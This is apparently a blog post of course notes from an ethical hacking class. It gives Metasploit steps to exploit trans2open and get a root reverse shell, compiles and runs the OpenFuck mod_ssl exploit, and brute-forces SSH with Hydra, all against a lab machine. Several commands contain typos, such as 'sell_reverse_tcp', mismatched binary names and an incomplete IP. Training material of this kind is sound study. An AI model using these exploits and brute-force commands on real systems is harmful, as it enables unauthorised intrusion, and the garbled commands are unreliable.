Exploitation Basics – Practical Ethical Hacking by TCM

by Kal Bartal

Reverse Shells vs Bind Shells

Source: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

The most common shell is a reverse shell.

A shell is access to a machine. Popping a shell means getting access to a machine. A reverse means, a target machine connects to us.

Source: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

With the bind we open up a port on the target machine and we connect to it.

Reverse shells are more common. (95%)

Bind shells are typical to external assesments.

Reverse shell

Bind shell

Staged vs Non-Staged Payloads

Source: https://academy.tcm-sec.com/

A payload is what we run as an exploit.

The ‘/’ (forward slash) identifies a staged payload.

Gaining Root with Metasploit

msfconsole
search trans2open
use 1
options
set rhosts 192.168.57
show targets
run

or

exploit

Session dies. (staged payload)

set payload linux/x86/sell_reverse_tcp

(set non-staged payload)

run
whoami
root
hostname
kioptrix.level1

Manual Exploitation
mod_ssl exploit

https://github.com/heltonWernik/OpenLuck

1, Download OpenFuck.c

git clone https://github.com/heltonWernik/OpenFuck.git

2, Install ssl-dev library

apt-get install libssl-dev

3, It’s Compile Time

gcc -o OpenFuck OpenFuck.c -lcrypto

4, Running the Exploit

./OpenFuck
./open 0x6b 192.168.57.134 -c 40

Brute Force Attacks
Bruteforcing SSH is typically not the low hanging fruit.

Still, there are three reasons for trying it:

  1. Testing passwords strength
  2. Test if we can get in with a week or default password
  3. Testing how well the blue team performs

Hydra is a bruteforce tool.

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.134:22 -t 4 -V

or >>>

msfconsole
search ssh

(17 auxiliary/scanner/ssh/ssh_login)

use auxiliary/scanner/ssh/ssh_login
options
set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts 192.168.57.134
run

Credential Stuffing and Password Spraying

Credential Stuffing

source: https://www.owasp.org

Credential stuffing is injecting account breached credentials in hopes of account takeover.

Look for status change in the results.

Add response text to grep match.

Password Spraying

Related Posts

Leave a Comment